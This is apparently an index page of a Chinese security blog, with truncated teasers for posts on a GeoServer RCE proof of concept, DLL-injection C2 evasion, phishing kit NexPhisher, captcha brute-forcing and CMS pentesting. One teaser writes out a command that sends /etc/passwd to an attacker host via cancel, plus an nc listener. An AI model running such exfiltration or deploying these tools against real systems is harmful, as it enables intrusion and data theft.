API 接口测试
一、API 接口介绍 1.1 RPC(远程过程调用) 远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。该协议允许运行于一台计算机的程序调用另一台计算机的子程序,而程...
先锋马上线后渗透-dll注入上线
Q&A 为什么我们需要白加黑这种攻击方法呢? 答:无论是分离免杀还是捆绑上线的免杀方式早已被研究员们每天推演成千上万遍了,像CS这类主流的C2工具的yara规则早就被各大安全厂商研究透了,...
GeoServer 远程代码执行漏洞 CVE-2024-36401 POC
漏洞描述 GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。 在GeoServer 2.25.1, 2.24.3, 2.23.5版...
爆火的AI一键换装软件! 只需2步,效果杠杠的!!完全免费开源,IDM-VTON :更衣更强、更容易!
AI 换装 软件下载:https://xsx.tw/ai/4145/A I视频换脸 软件:https://xsx.tw/xss/4153/
九某草 X站cms 渗透
这一套源码与网上那些X站cms都是一致,那么在奇安信社区上看到了这款,那么也来玩玩,这一套源码的话基本的都是存在后台提权、存储xss、反射XSS、弱口令(至于弱口令这块一般安装后直接使用admi...
Cloudflare Radar Scan 网站框架技术在线检测工具
Cloudflare Radar Scan简介 为了更好地了解世界各地的互联网使用情况,可以借助Cloudflare 的 URL 扫描器调查域、IP、URL 或 ASN 的详细信息。 截图 网站使用了哪些技术(php、mysql、nginx、wo...
验证码识别爆破python版-2.0终极版
说明 显而易见,进行了颜色显示美化。 对传参进行了优化,命令不像之前那么脓肿麻烦了,如: 设置多个自定义请求头:-lh 'xx:xx' -lh 'aa:aa' FORM 数据类型数据包传参:-d 'username=bWTdXxa2S...
nexphisher自动化钓鱼工具,包括30个网站的37个钓鱼模板
项目地址: GitHub: https://github.com/xsxtw/nexphisher nexphisher自动化钓鱼工具描述 ①NexPhisher是专为Termux和Linux开发的自动网络钓鱼工具。 ②NexPhisher这个工具有30个网站的37个网络...
奇淫技巧:linux下无回显可将回显发送到服务器
靶机无回显的情况下,可使用 cancel 来把回显发送到攻击机端 cancel -u '$(cat /etc/passwd)' -h ip:port 攻击机用nc来接收返回信息 nc -lvvp [port] 实例演示: 攻击机ip:192...
